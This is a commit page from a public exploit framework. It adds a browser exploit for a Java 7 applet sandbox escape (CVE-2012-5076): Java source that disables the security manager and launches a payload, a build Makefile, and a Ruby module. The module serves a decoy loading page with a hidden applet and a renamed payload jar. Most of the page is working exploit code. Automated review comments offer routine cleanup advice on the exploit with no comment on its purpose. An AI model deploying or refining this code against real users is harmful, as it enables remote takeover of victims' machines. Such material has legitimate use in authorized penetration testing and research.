
Merge branch 'java_jre17_glassfish_averagerangestatisticimpl' of https://github.com/jvazquez-r7/metasploit-framework into jvazquez-r7-java_jre17_glassfish_averagerangestatisticimpl
2 parents c498930 + 3465aa0 commit 807bd6e88ac90e8cfdc260bcbe1e0fadf17de725 jvazquez-r7 committed
BIN data/exploits/cve-2012-5076_2/B.class
Binary file not shown.
BIN data/exploits/cve-2012-5076_2/Exploit.class
Binary file not shown.
19 external/source/exploits/cve-2012-5076_2/B.java
@@ -0,0 +1,19 @@
+import java.security.AccessController;
+import java.security.PrivilegedExceptionAction;
+
+public class B
+ implements PrivilegedExceptionAction
+{
+ public B()
+ {
+ try
+ {
+ AccessController.doPrivileged(this); } catch (Exception e) {
+ }
+ }
+
+ public Object run() {
+ System.setSecurityManager(null);
+ return new Object();
+ }
+}
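Review bot: The constructor swallows every failure of `AccessController.doPrivileged(this)` with an empty `catch (Exception e) { }`, so a reader cannot tell whether a failure there is expected or a bug. If ignoring it is deliberate, rename the variable and say why in place: `} catch (Exception ignored) { // TODO: state why a failed doPrivileged is ignored here }`. `PrivilegedExceptionAction` is also implemented as a raw type; `implements PrivilegedExceptionAction<Object>` would match the `Object run()` signature, although the Makefile in this commit compiles with `-source 1.2`, which predates generics, so that change may have to wait for a newer source level. A one-line class Javadoc describing the role of this helper class would also help, since the file has no comments at all.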
78 external/source/exploits/cve-2012-5076_2/Exploit.java
@@ -0,0 +1,78 @@
+import java.io.ByteArrayOutputStream;
+import java.io.IOException;
+import java.io.InputStream;
+import java.io.ObjectInputStream;
+import java.io.ObjectOutputStream;
+import metasploit.Payload;
+//import java.lang.Runtime;
+import java.applet.Applet;
+import java.lang.invoke.MethodHandle;
+import java.lang.invoke.MethodHandles;
+import java.lang.invoke.MethodType;
+import java.lang.reflect.Method;
+import com.sun.org.glassfish.external.statistics.impl.*;
+
+public class Exploit extends Applet
+{
+ public static MethodHandles.Lookup test0;
+
+ public Exploit()
+ {
+ }
+
+
+ public void init()
+ {
+ try
+ {
+
+ ByteArrayOutputStream bos = new ByteArrayOutputStream();
+ byte[] buffer = new byte[8192];
+ int length;
+
+ // read in the class file from the jar
+ InputStream is = getClass().getResourceAsStream("B.class");
+ // and write it out to the byte array stream
+ while( ( length = is.read( buffer ) ) > 0 )
+ bos.write( buffer, 0, length );
+ // convert it to a simple byte array
+ buffer = bos.toByteArray();
+
+ Class c = Class.forName("java.lang.invoke.MethodHandles");
+ Method m = c.getMethod("lookup", new Class[0]);
+ AverageRangeStatisticImpl Avrg = new AverageRangeStatisticImpl(0,0,0,"","","",0,0);
+ MethodHandles.Lookup test = (MethodHandles.Lookup)Avrg.invoke(null, m, new Object[0]);
+
+ MethodType localMethodType0 = MethodType.methodType(Class.class, String.class);
+ MethodHandle localMethodHandle0 = test.findStatic(Class.class, "forName", localMethodType0);
+ Class localClass1 = (Class)localMethodHandle0.invokeWithArguments(new Object[] { "sun.org.mozilla.javascript.internal.Context" });
+ Class localClass2 = (Class)localMethodHandle0.invokeWithArguments(new Object[] { "sun.org.mozilla.javascript.internal.GeneratedClassLoader" });
+
+ // Instance of sun.org.mozilla.javascript.internal.Context
+ MethodType localMethodType1 = MethodType.methodType(Void.TYPE);
+ MethodHandle localMethodHandle1 = test.findConstructor(localClass1, localMethodType1);
+ Object localObject1 = localMethodHandle1.invokeWithArguments(new Object[0]);
+
+ // Context.createClassLoader
+ MethodType localMethodType2 = MethodType.methodType(localClass2, ClassLoader.class);
+ MethodHandle localMethodHandle2 = test.findVirtual(localClass1, "createClassLoader", localMethodType2);
+ Object localObject2 = localMethodHandle2.invokeWithArguments(new Object[] { localObject1, null });
+
+ // GeneratedClassLoader.defineClass
+ MethodType localMethodType3 = MethodType.methodType(Class.class, String.class, new Class[] { byte[].class });
+ MethodHandle localMethodHandle3 = test.findVirtual(localClass2, "defineClass", localMethodType3);
+ Class localClass3 = (Class)localMethodHandle3.invokeWithArguments(new Object[] { localObject2, null, buffer });
+
+ //New instance of the helper Class
+ localClass3.newInstance();
+
+ Payload.main(null);
+ //Runtime.getRuntime().exec("calc.exe");
+ }
+ catch(Throwable ex)
+ {
+ //ex.printStackTrace();
+ }
+ }
+
+}
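Review bot: The `InputStream is` obtained from `getClass().getResourceAsStream("B.class")` in `init()` is never closed, and when the resource is absent it is null, so the resulting NullPointerException disappears into the empty `catch(Throwable ex)` block whose `ex.printStackTrace()` is commented out. Since the Makefile in this commit compiles with `-source 1.2`, try-with-resources is unavailable; check `is` for null before the loop and close it once the loop finishes (`is.close();`) to get the same cleanup. The commented-out `//import java.lang.Runtime;` and `//Runtime.getRuntime().exec("calc.exe");` lines are dead code and should be deleted rather than left as comments. The `public static MethodHandles.Lookup test0` field is never read or written anywhere in this file and looks like a leftover as well.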
18 external/source/exploits/cve-2012-5076_2/Makefile
@@ -0,0 +1,18 @@
+# rt.jar must be in the classpath!
+
+CLASSES = \
+ Exploit.java \
+ B.java
+
+.SUFFIXES: .java .class
+.java.class:
+ javac -source 1.2 -target 1.2 -cp "../../../../data/java" $*.java
+
+all: $(CLASSES:.java=.class)
+
+install:
+ mv Exploit.class ../../../../data/exploits/cve-2013-0422/
+ mv B.class ../../../../data/exploits/cve-2013-0422/
+
+clean:
+ rm -rf *.class
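Review bot: The `install` target moves `Exploit.class` and `B.class` into `../../../../data/exploits/cve-2013-0422/`, but the binaries committed here and the module's `setup` read from `data/exploits/cve-2012-5076_2`, so running `make install` would drop the classes into a different exploit's directory; this looks like a copy-paste leftover and both `mv` lines should target `../../../../data/exploits/cve-2012-5076_2/`. The `-source 1.2 -target 1.2` flags also deserve a comment next to `# rt.jar must be in the classpath!` explaining why such an old source level is used, given that the Java sources in this commit depend on `java.lang.invoke` types that only exist in a Java 7 runtime.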
132 modules/exploits/multi/browser/java_jre17_glassfish_averagerangestatisticimpl.rb
@@ -0,0 +1,132 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+require 'rex'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpServer::HTML
+ include Msf::Exploit::EXE
+
+ include Msf::Exploit::Remote::BrowserAutopwn
+ autopwn_info({ :javascript => false })
+
+ def initialize( info = {} )
+
+ super( update_info( info,
+ 'Name' => 'Java Applet AverageRangeStatisticImpl Remote Code Execution',
+ 'Description' => %q{
+ This module abuses the AverageRangeStatisticImpl from a Java Applet to run
+ arbitrary Java code outside of the sandbox, a different exploit vector than the one
+ exploited in the wild in November of 2012. The vulnerability affects Java version
+ 7u7 and earlier.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Unknown', # Vulnerability discovery at security-explorations
+ 'juan vazquez' # Metasploit module
+ ],
+ 'References' =>
+ [
+ [ 'CVE', '2012-5076' ],
+ [ 'OSVDB', '86363' ],
+ [ 'BID', '56054' ],
+ [ 'URL', 'http://www.oracle.com/technetwork/topics/security/javacpuoct2012-1515924.html' ],
+ [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2012-5076' ],
+ [ 'URL', 'http://www.security-explorations.com/materials/se-2012-01-report.pdf' ]
+ ],
+ 'Platform' => [ 'java', 'win', 'osx', 'linux' ],
+ 'Payload' => { 'Space' => 20480, 'DisableNops' => true },
+ 'Targets' =>
+ [
+ [ 'Generic (Java Payload)',
+ {
+ 'Platform' => ['java'],
+ 'Arch' => ARCH_JAVA,
+ }
+ ],
+ [ 'Windows x86 (Native Payload)',
+ {
+ 'Platform' => 'win',
+ 'Arch' => ARCH_X86,
+ }
+ ],
+ [ 'Mac OS X x86 (Native Payload)',
+ {
+ 'Platform' => 'osx',
+ 'Arch' => ARCH_X86,
+ }
+ ],
+ [ 'Linux x86 (Native Payload)',
+ {
+ 'Platform' => 'linux',
+ 'Arch' => ARCH_X86,
+ }
+ ],
+ ],
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => 'Oct 16 2012'
+ ))
+ end
+
+
+ def setup
+ path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2012-5076_2", "Exploit.class")
+ @exploit_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
+ path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2012-5076_2", "B.class")
+ @loader_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
+
+ @exploit_class_name = rand_text_alpha("Exploit".length)
+ @exploit_class.gsub!("Exploit", @exploit_class_name)
+ super
+ end
+
+ def on_request_uri(cli, request)
+ print_status("handling request for #{request.uri}")
+
+ case request.uri
+ when /\.jar$/i
+ jar = payload.encoded_jar
+ jar.add_file("#{@exploit_class_name}.class", @exploit_class)
+ jar.add_file("B.class", @loader_class)
+ metasploit_str = rand_text_alpha("metasploit".length)
+ payload_str = rand_text_alpha("payload".length)
+ jar.entries.each { |entry|
+ entry.name.gsub!("metasploit", metasploit_str)
+ entry.name.gsub!("Payload", payload_str)
+ entry.data = entry.data.gsub("metasploit", metasploit_str)
+ entry.data = entry.data.gsub("Payload", payload_str)
+ }
+ jar.build_manifest
+
+ send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
+ when /\/$/
+ payload = regenerate_payload(cli)
+ if not payload
+ print_error("Failed to generate the payload.")
+ send_not_found(cli)
+ return
+ end
+ send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
+ else
+ send_redirect(cli, get_resource() + '/', '')
+ end
+
+ end
+
+ def generate_html
+ html = %Q|<html><head><title>Loading, Please Wait...</title></head>|
+ html += %Q|<body><center><p>Loading, Please Wait...</p></center>|
+ html += %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@exploit_class_name}.class" width="1" height="1">|
+ html += %Q|</applet></body></html>|
+ return html
+ end
+
+end
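Review bot: In `on_request_uri`, the `when /\/$/` branch assigns a local named `payload` (`payload = regenerate_payload(cli)`) while the `.jar` branch above calls the `payload` method via `payload.encoded_jar`; Ruby treats the earlier reference as a method call only because the assignment appears later in the text, which silently breaks if the branches are ever reordered. Dropping the local avoids the shadowing and reads better than `if not payload`: `unless regenerate_payload(cli)` followed by the existing `print_error`/`send_not_found`/`return` lines keeps the same control flow. The `.jar` branch itself has no comment explaining why `jar.build_manifest` must run after the entries are renamed; a one-line note there would help the next maintainer.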
